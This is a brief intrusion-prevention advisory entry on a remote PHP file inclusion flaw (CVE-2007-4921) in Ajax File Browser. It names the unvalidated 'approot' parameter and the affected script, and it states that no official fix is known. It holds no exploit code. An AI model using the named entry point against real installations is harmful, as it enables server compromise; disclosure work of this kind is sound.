Intrusion Prevention

Ajax.File.Browser.approot.Parameter.File.Inclusion

Description

This indicates a vulnerability in Ajax File Browser. This vulnerability is caused by the failure to validate the "approot" parameter in the "_includes/settings.inc.php" script. The vulnerability allows remote attackers to include malicious PHP scripts and execute arbitrary commands.

Affected Products

Ajax File Browser version 3 beta 2007-08-28 and prior.

Impact

System compromise, remote script execution.

Recommended Actions

Currently we are not aware of any official fix for this issue.

CVE References

CVE-2007-4921